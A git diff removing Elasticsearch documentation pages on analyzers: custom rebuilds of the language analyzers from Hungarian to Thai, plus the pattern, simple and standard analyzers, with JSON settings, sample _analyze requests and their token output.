/hungarian_example -{ - "settings": { - "analysis": { - "filter": { - "hungarian_stop": { - "type": "stop", - "stopwords": "_hungarian_" <1> - }, - "hungarian_keywords": { - "type": "keyword_marker", - "keywords": ["példa"] <2> - }, - "hungarian_stemmer": { - "type": "stemmer", - "language": "hungarian" - } - }, - "analyzer": { - "rebuilt_hungarian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "hungarian_stop", - "hungarian_keywords", - "hungarian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"hungarian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: hungarian_example, first: hungarian, second: rebuilt_hungarian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - - -[[indonesian-analyzer]] -===== `indonesian` analyzer - -The `indonesian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /indonesian_example -{ - "settings": { - "analysis": { - "filter": { - "indonesian_stop": { - "type": "stop", - "stopwords": "_indonesian_" <1> - }, - "indonesian_keywords": { - "type": "keyword_marker", - "keywords": ["contoh"] <2> - }, - "indonesian_stemmer": { - "type": "stemmer", - "language": "indonesian" - } - }, - "analyzer": { - "rebuilt_indonesian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "indonesian_stop", - "indonesian_keywords", - "indonesian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"indonesian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: indonesian_example, first: indonesian, second: rebuilt_indonesian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[irish-analyzer]] -===== `irish` analyzer - -The `irish` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /irish_example -{ - "settings": { - "analysis": { - "filter": { - "irish_hyphenation": { - "type": "stop", - "stopwords": [ "h", "n", "t" ], - "ignore_case": true - }, - "irish_elision": { - "type": "elision", - "articles": [ "d", "m", "b" ], - "articles_case": true - }, - "irish_stop": { - "type": "stop", - "stopwords": "_irish_" <1> - }, - "irish_lowercase": { - "type": "lowercase", - "language": "irish" - }, - "irish_keywords": { - "type": "keyword_marker", - "keywords": ["sampla"] <2> - }, - "irish_stemmer": { - "type": "stemmer", - "language": "irish" - } - }, - "analyzer": { - "rebuilt_irish": { - "tokenizer": "standard", - "filter": [ - "irish_hyphenation", - "irish_elision", - "irish_lowercase", - "irish_stop", - "irish_keywords", - "irish_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"irish_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: irish_example, first: irish, second: rebuilt_irish}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[italian-analyzer]] -===== `italian` analyzer - -The `italian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /italian_example -{ - "settings": { - "analysis": { - "filter": { - "italian_elision": { - "type": "elision", - "articles": [ - "c", "l", "all", "dall", "dell", - "nell", "sull", "coll", "pell", - "gl", "agl", "dagl", "degl", "negl", - "sugl", "un", "m", "t", "s", "v", "d" - ], - "articles_case": true - }, - "italian_stop": { - "type": "stop", - "stopwords": "_italian_" <1> - }, - "italian_keywords": { - "type": "keyword_marker", - "keywords": ["esempio"] <2> - }, - "italian_stemmer": { - "type": "stemmer", - "language": "light_italian" - } - }, - "analyzer": { - "rebuilt_italian": { - "tokenizer": "standard", - "filter": [ - "italian_elision", - "lowercase", - "italian_stop", - "italian_keywords", - "italian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"italian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: italian_example, first: italian, second: rebuilt_italian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[latvian-analyzer]] -===== `latvian` analyzer - -The `latvian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /latvian_example -{ - "settings": { - "analysis": { - "filter": { - "latvian_stop": { - "type": "stop", - "stopwords": "_latvian_" <1> - }, - "latvian_keywords": { - "type": "keyword_marker", - "keywords": ["piemērs"] <2> - }, - "latvian_stemmer": { - "type": "stemmer", - "language": "latvian" - } - }, - "analyzer": { - "rebuilt_latvian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "latvian_stop", - "latvian_keywords", - "latvian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"latvian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: latvian_example, first: latvian, second: rebuilt_latvian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[lithuanian-analyzer]] -===== `lithuanian` analyzer - -The `lithuanian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /lithuanian_example -{ - "settings": { - "analysis": { - "filter": { - "lithuanian_stop": { - "type": "stop", - "stopwords": "_lithuanian_" <1> - }, - "lithuanian_keywords": { - "type": "keyword_marker", - "keywords": ["pavyzdys"] <2> - }, - "lithuanian_stemmer": { - "type": "stemmer", - "language": "lithuanian" - } - }, - "analyzer": { - "rebuilt_lithuanian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "lithuanian_stop", - "lithuanian_keywords", - "lithuanian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"lithuanian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: lithuanian_example, first: lithuanian, second: rebuilt_lithuanian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[norwegian-analyzer]] -===== `norwegian` analyzer - -The `norwegian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /norwegian_example -{ - "settings": { - "analysis": { - "filter": { - "norwegian_stop": { - "type": "stop", - "stopwords": "_norwegian_" <1> - }, - "norwegian_keywords": { - "type": "keyword_marker", - "keywords": ["eksempel"] <2> - }, - "norwegian_stemmer": { - "type": "stemmer", - "language": "norwegian" - } - }, - "analyzer": { - "rebuilt_norwegian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "norwegian_stop", - "norwegian_keywords", - "norwegian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"norwegian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: norwegian_example, first: norwegian, second: rebuilt_norwegian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[persian-analyzer]] -===== `persian` analyzer - -The `persian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /persian_example -{ - "settings": { - "analysis": { - "char_filter": { - "zero_width_spaces": { - "type": "mapping", - "mappings": [ "\\u200C=>\\u0020"] <1> - } - }, - "filter": { - "persian_stop": { - "type": "stop", - "stopwords": "_persian_" <2> - } - }, - "analyzer": { - "rebuilt_persian": { - "tokenizer": "standard", - "char_filter": [ "zero_width_spaces" ], - "filter": [ - "lowercase", - "decimal_digit", - "arabic_normalization", - "persian_normalization", - "persian_stop" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: persian_example, first: persian, second: rebuilt_persian}\nendyaml\n/] - -<1> Replaces zero-width non-joiners with an ASCII space. -<2> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. - -[[portuguese-analyzer]] -===== `portuguese` analyzer - -The `portuguese` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /portuguese_example -{ - "settings": { - "analysis": { - "filter": { - "portuguese_stop": { - "type": "stop", - "stopwords": "_portuguese_" <1> - }, - "portuguese_keywords": { - "type": "keyword_marker", - "keywords": ["exemplo"] <2> - }, - "portuguese_stemmer": { - "type": "stemmer", - "language": "light_portuguese" - } - }, - "analyzer": { - "rebuilt_portuguese": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "portuguese_stop", - "portuguese_keywords", - "portuguese_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"portuguese_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: portuguese_example, first: portuguese, second: rebuilt_portuguese}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[romanian-analyzer]] -===== `romanian` analyzer - -The `romanian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /romanian_example -{ - "settings": { - "analysis": { - "filter": { - "romanian_stop": { - "type": "stop", - "stopwords": "_romanian_" <1> - }, - "romanian_keywords": { - "type": "keyword_marker", - "keywords": ["exemplu"] <2> - }, - "romanian_stemmer": { - "type": "stemmer", - "language": "romanian" - } - }, - "analyzer": { - "rebuilt_romanian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "romanian_stop", - "romanian_keywords", - "romanian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"romanian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: romanian_example, first: romanian, second: rebuilt_romanian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - - -[[russian-analyzer]] -===== `russian` analyzer - -The `russian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /russian_example -{ - "settings": { - "analysis": { - "filter": { - "russian_stop": { - "type": "stop", - "stopwords": "_russian_" <1> - }, - "russian_keywords": { - "type": "keyword_marker", - "keywords": ["пример"] <2> - }, - "russian_stemmer": { - "type": "stemmer", - "language": "russian" - } - }, - "analyzer": { - "rebuilt_russian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "russian_stop", - "russian_keywords", - "russian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"russian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: russian_example, first: russian, second: rebuilt_russian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[sorani-analyzer]] -===== `sorani` analyzer - -The `sorani` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /sorani_example -{ - "settings": { - "analysis": { - "filter": { - "sorani_stop": { - "type": "stop", - "stopwords": "_sorani_" <1> - }, - "sorani_keywords": { - "type": "keyword_marker", - "keywords": ["mînak"] <2> - }, - "sorani_stemmer": { - "type": "stemmer", - "language": "sorani" - } - }, - "analyzer": { - "rebuilt_sorani": { - "tokenizer": "standard", - "filter": [ - "sorani_normalization", - "lowercase", - "decimal_digit", - "sorani_stop", - "sorani_keywords", - "sorani_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"sorani_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: sorani_example, first: sorani, second: rebuilt_sorani}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[spanish-analyzer]] -===== `spanish` analyzer - -The `spanish` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /spanish_example -{ - "settings": { - "analysis": { - "filter": { - "spanish_stop": { - "type": "stop", - "stopwords": "_spanish_" <1> - }, - "spanish_keywords": { - "type": "keyword_marker", - "keywords": ["ejemplo"] <2> - }, - "spanish_stemmer": { - "type": "stemmer", - "language": "light_spanish" - } - }, - "analyzer": { - "rebuilt_spanish": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "spanish_stop", - "spanish_keywords", - "spanish_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"spanish_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: spanish_example, first: spanish, second: rebuilt_spanish}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[swedish-analyzer]] -===== `swedish` analyzer - -The `swedish` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /swedish_example -{ - "settings": { - "analysis": { - "filter": { - "swedish_stop": { - "type": "stop", - "stopwords": "_swedish_" <1> - }, - "swedish_keywords": { - "type": "keyword_marker", - "keywords": ["exempel"] <2> - }, - "swedish_stemmer": { - "type": "stemmer", - "language": "swedish" - } - }, - "analyzer": { - "rebuilt_swedish": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "swedish_stop", - "swedish_keywords", - "swedish_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"swedish_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: swedish_example, first: swedish, second: rebuilt_swedish}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[turkish-analyzer]] -===== `turkish` analyzer - -The `turkish` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /turkish_example -{ - "settings": { - "analysis": { - "filter": { - "turkish_stop": { - "type": "stop", - "stopwords": "_turkish_" <1> - }, - "turkish_lowercase": { - "type": "lowercase", - "language": "turkish" - }, - "turkish_keywords": { - "type": "keyword_marker", - "keywords": ["örnek"] <2> - }, - "turkish_stemmer": { - "type": "stemmer", - "language": "turkish" - } - }, - "analyzer": { - "rebuilt_turkish": { - "tokenizer": "standard", - "filter": [ - "apostrophe", - "turkish_lowercase", - "turkish_stop", - "turkish_keywords", - "turkish_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"turkish_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: turkish_example, first: turkish, second: rebuilt_turkish}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[thai-analyzer]] -===== `thai` analyzer - -The `thai` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /thai_example -{ - "settings": { - "analysis": { - "filter": { - "thai_stop": { - "type": "stop", - "stopwords": "_thai_" <1> - } - }, - "analyzer": { - "rebuilt_thai": { - "tokenizer": "thai", - "filter": [ - "lowercase", - "decimal_digit", - "thai_stop" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"thai_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: thai_example, first: thai, second: rebuilt_thai}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. diff --git a/docs/reference/analysis/analyzers/pattern-analyzer.asciidoc b/docs/reference/analysis/analyzers/pattern-analyzer.asciidoc deleted file mode 100644 index 7327cee996f..00000000000 --- a/docs/reference/analysis/analyzers/pattern-analyzer.asciidoc +++ /dev/null @@ -1,411 +0,0 @@ -[[analysis-pattern-analyzer]] -=== Pattern analyzer -++++ -Pattern -++++ - -The `pattern` analyzer uses a regular expression to split the text into terms. -The regular expression should match the *token separators* not the tokens -themselves. The regular expression defaults to `\W+` (or all non-word characters). - -[WARNING] -.Beware of Pathological Regular Expressions -======================================== - -The pattern analyzer uses -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java Regular Expressions]. - -A badly written regular expression could run very slowly or even throw a -StackOverflowError and cause the node it is running on to exit suddenly. - -Read more about https://www.regular-expressions.info/catastrophic.html[pathological regular expressions and how to avoid them]. - -======================================== - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "analyzer": "pattern", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "word", - "position": 1 - }, - { - "token": "quick", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 2 - }, - { - "token": "brown", - "start_offset": 12, - "end_offset": 17, - "type": "word", - "position": 3 - }, - { - "token": "foxes", - "start_offset": 18, - "end_offset": 23, - "type": "word", - "position": 4 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "word", - "position": 5 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "word", - "position": 6 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "word", - "position": 7 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "word", - "position": 8 - }, - { - "token": "dog", - "start_offset": 45, - "end_offset": 48, - "type": "word", - "position": 9 - }, - { - "token": "s", - "start_offset": 49, - "end_offset": 50, - "type": "word", - "position": 10 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "word", - "position": 11 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ the, 2, quick, brown, foxes, jumped, over, the, lazy, dog, s, bone ] ---------------------------- - -[discrete] -=== Configuration - -The `pattern` analyzer accepts the following parameters: - -[horizontal] -`pattern`:: - - A https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java regular expression], defaults to `\W+`. - -`flags`:: - - Java regular expression https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html#field.summary[flags]. - Flags should be pipe-separated, eg `"CASE_INSENSITIVE|COMMENTS"`. - -`lowercase`:: - - Should terms be lowercased or not. Defaults to `true`. - -`stopwords`:: - - A pre-defined stop words list like `_english_` or an array containing a - list of stop words. Defaults to `_none_`. - -`stopwords_path`:: - - The path to a file containing stop words. - -See the <> for more information -about stop word configuration. - - -[discrete] -=== Example configuration - -In this example, we configure the `pattern` analyzer to split email addresses -on non-word characters or on underscores (`\W|_`), and to lower-case the result: - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_email_analyzer": { - "type": "pattern", - "pattern": "\\W|_", <1> - "lowercase": true - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_email_analyzer", - "text": "John_Smith@foo-bar.com" -} ----------------------------- - -<1> The backslashes in the pattern need to be escaped when specifying the - pattern as a JSON string. - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "john", - "start_offset": 0, - "end_offset": 4, - "type": "word", - "position": 0 - }, - { - "token": "smith", - "start_offset": 5, - "end_offset": 10, - "type": "word", - "position": 1 - }, - { - "token": "foo", - "start_offset": 11, - "end_offset": 14, - "type": "word", - "position": 2 - }, - { - "token": "bar", - "start_offset": 15, - "end_offset": 18, - "type": "word", - "position": 3 - }, - { - "token": "com", - "start_offset": 19, - "end_offset": 22, - "type": "word", - "position": 4 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ john, smith, foo, bar, com ] ---------------------------- - -[discrete] -==== CamelCase tokenizer - -The following more complicated example splits CamelCase text into tokens: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "camel": { - "type": "pattern", - "pattern": "([^\\p{L}\\d]+)|(?<=\\D)(?=\\d)|(?<=\\d)(?=\\D)|(?<=[\\p{L}&&[^\\p{Lu}]])(?=\\p{Lu})|(?<=\\p{Lu})(?=\\p{Lu}[\\p{L}&&[^\\p{Lu}]])" - } - } - } - } -} - -GET my-index-000001/_analyze -{ - "analyzer": "camel", - "text": "MooseX::FTPClass2_beta" -} --------------------------------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "moose", - "start_offset": 0, - "end_offset": 5, - "type": "word", - "position": 0 - }, - { - "token": "x", - "start_offset": 5, - "end_offset": 6, - "type": "word", - "position": 1 - }, - { - "token": "ftp", - "start_offset": 8, - "end_offset": 11, - "type": "word", - "position": 2 - }, - { - "token": "class", - "start_offset": 11, - "end_offset": 16, - "type": "word", - "position": 3 - }, - { - "token": "2", - "start_offset": 16, - "end_offset": 17, - "type": "word", - "position": 4 - }, - { - "token": "beta", - "start_offset": 18, - "end_offset": 22, - "type": "word", - "position": 5 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ moose, x, ftp, class, 2, beta ] ---------------------------- - -The regex above is easier to understand as: - -[source,regex] --------------------------------------------------- - ([^\p{L}\d]+) # swallow non letters and numbers, -| (?<=\D)(?=\d) # or non-number followed by number, -| (?<=\d)(?=\D) # or number followed by non-number, -| (?<=[ \p{L} && [^\p{Lu}]]) # or lower case - (?=\p{Lu}) # followed by upper case, -| (?<=\p{Lu}) # or upper case - (?=\p{Lu} # followed by upper case - [\p{L}&&[^\p{Lu}]] # then lower case - ) --------------------------------------------------- - -[discrete] -=== Definition - -The `pattern` anlayzer consists of: - -Tokenizer:: -* <> - -Token Filters:: -* <> -* <> (disabled by default) - -If you need to customize the `pattern` analyzer beyond the configuration -parameters then you need to recreate it as a `custom` analyzer and modify -it, usually by adding token filters. This would recreate the built-in -`pattern` analyzer and you can use it as a starting point for further -customization: - -[source,console] ----------------------------------------------------- -PUT /pattern_example -{ - "settings": { - "analysis": { - "tokenizer": { - "split_on_non_word": { - "type": "pattern", - "pattern": "\\W+" <1> - } - }, - "analyzer": { - "rebuilt_pattern": { - "tokenizer": "split_on_non_word", - "filter": [ - "lowercase" <2> - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: pattern_example, first: pattern, second: rebuilt_pattern}\nendyaml\n/] -<1> The default pattern is `\W+` which splits on non-word characters -and this is where you'd change it. -<2> You'd add other token filters after `lowercase`. diff --git a/docs/reference/analysis/analyzers/simple-analyzer.asciidoc b/docs/reference/analysis/analyzers/simple-analyzer.asciidoc deleted file mode 100644 index 511d9d164d8..00000000000 --- a/docs/reference/analysis/analyzers/simple-analyzer.asciidoc +++ /dev/null @@ -1,150 +0,0 @@ -[[analysis-simple-analyzer]] -=== Simple analyzer -++++ -Simple -++++ - -The `simple` analyzer breaks text into tokens at any non-letter character, such -as numbers, spaces, hyphens and apostrophes, discards non-letter characters, -and changes uppercase to lowercase. - -[[analysis-simple-analyzer-ex]] -==== Example - -[source,console] ----- -POST _analyze -{ - "analyzer": "simple", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "quick", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 1 - }, - { - "token": "brown", - "start_offset": 12, - "end_offset": 17, - "type": "word", - "position": 2 - }, - { - "token": "foxes", - "start_offset": 18, - "end_offset": 23, - "type": "word", - "position": 3 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "word", - "position": 4 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "word", - "position": 5 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "word", - "position": 6 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "word", - "position": 7 - }, - { - "token": "dog", - "start_offset": 45, - "end_offset": 48, - "type": "word", - "position": 8 - }, - { - "token": "s", - "start_offset": 49, - "end_offset": 50, - "type": "word", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "word", - "position": 10 - } - ] -} ----- -//// - -The `simple` analyzer parses the sentence and produces the following -tokens: - -[source,text] ----- -[ the, quick, brown, foxes, jumped, over, the, lazy, dog, s, bone ] ----- - -[[analysis-simple-analyzer-definition]] -==== Definition - -The `simple` analyzer is defined by one tokenizer: - -Tokenizer:: -* <> - -[[analysis-simple-analyzer-customize]] -==== Customize - -To customize the `simple` analyzer, duplicate it to create the basis for -a custom analyzer. This custom analyzer can be modified as required, usually by -adding token filters. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_custom_simple_analyzer": { - "tokenizer": "lowercase", - "filter": [ <1> - ] - } - } - } - } -} ----- -<1> Add token filters here. \ No newline at end of file diff --git a/docs/reference/analysis/analyzers/standard-analyzer.asciidoc b/docs/reference/analysis/analyzers/standard-analyzer.asciidoc deleted file mode 100644 index 459d1098341..00000000000 --- a/docs/reference/analysis/analyzers/standard-analyzer.asciidoc +++ /dev/null @@ -1,302 +0,0 @@ -[[analysis-standard-analyzer]] -=== Standard analyzer -++++ -Standard -++++ - -The `standard` analyzer is the default analyzer which is used if none is -specified. It provides grammar based tokenization (based on the Unicode Text -Segmentation algorithm, as specified in -https://unicode.org/reports/tr29/[Unicode Standard Annex #29]) and works well -for most languages. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "analyzer": "standard", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "", - "position": 1 - }, - { - "token": "quick", - "start_offset": 6, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "brown", - "start_offset": 12, - "end_offset": 17, - "type": "", - "position": 3 - }, - { - "token": "foxes", - "start_offset": 18, - "end_offset": 23, - "type": "", - "position": 4 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "", - "position": 5 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "", - "position": 6 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "", - "position": 7 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "", - "position": 8 - }, - { - "token": "dog's", - "start_offset": 45, - "end_offset": 50, - "type": "", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "", - "position": 10 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ the, 2, quick, brown, foxes, jumped, over, the, lazy, dog's, bone ] ---------------------------- - -[discrete] -=== Configuration - -The `standard` analyzer accepts the following parameters: - -[horizontal] -`max_token_length`:: - - The maximum token length. If a token is seen that exceeds this length then - it is split at `max_token_length` intervals. Defaults to `255`. - -`stopwords`:: - - A pre-defined stop words list like `_english_` or an array containing a - list of stop words. Defaults to `_none_`. - -`stopwords_path`:: - - The path to a file containing stop words. - -See the <> for more information -about stop word configuration. - - -[discrete] -=== Example configuration - -In this example, we configure the `standard` analyzer to have a -`max_token_length` of 5 (for demonstration purposes), and to use the -pre-defined list of English stop words: - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_english_analyzer": { - "type": "standard", - "max_token_length": 5, - "stopwords": "_english_" - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_english_analyzer", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "", - "position": 1 - }, - { - "token": "quick", - "start_offset": 6, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "brown", - "start_offset": 12, - "end_offset": 17, - "type": "", - "position": 3 - }, - { - "token": "foxes", - "start_offset": 18, - "end_offset": 23, - "type": "", - "position": 4 - }, - { - "token": "jumpe", - "start_offset": 24, - "end_offset": 29, - "type": "", - "position": 5 - }, - { - "token": "d", - "start_offset": 29, - "end_offset": 30, - "type": "", - "position": 6 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "", - "position": 7 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "", - "position": 9 - }, - { - "token": "dog's", - "start_offset": 45, - "end_offset": 50, - "type": "", - "position": 10 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "", - "position": 11 - } - ] -} ----------------------------- - -///////////////////// - -The above example produces the following terms: - -[source,text] ---------------------------- -[ 2, quick, brown, foxes, jumpe, d, over, lazy, dog's, bone ] ---------------------------- - -[discrete] -=== Definition - -The `standard` analyzer consists of: - -Tokenizer:: -* <> - -Token Filters:: -* <> -* <> (disabled by default) - -If you need to customize the `standard` analyzer beyond the configuration -parameters then you need to recreate it as a `custom` analyzer and modify -it, usually by adding token filters. This would recreate the built-in -`standard` analyzer and you can use it as a starting point: - -[source,console] ----------------------------------------------------- -PUT /standard_example -{ - "settings": { - "analysis": { - "analyzer": { - "rebuilt_standard": { - "tokenizer": "standard", - "filter": [ - "lowercase" <1> - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - 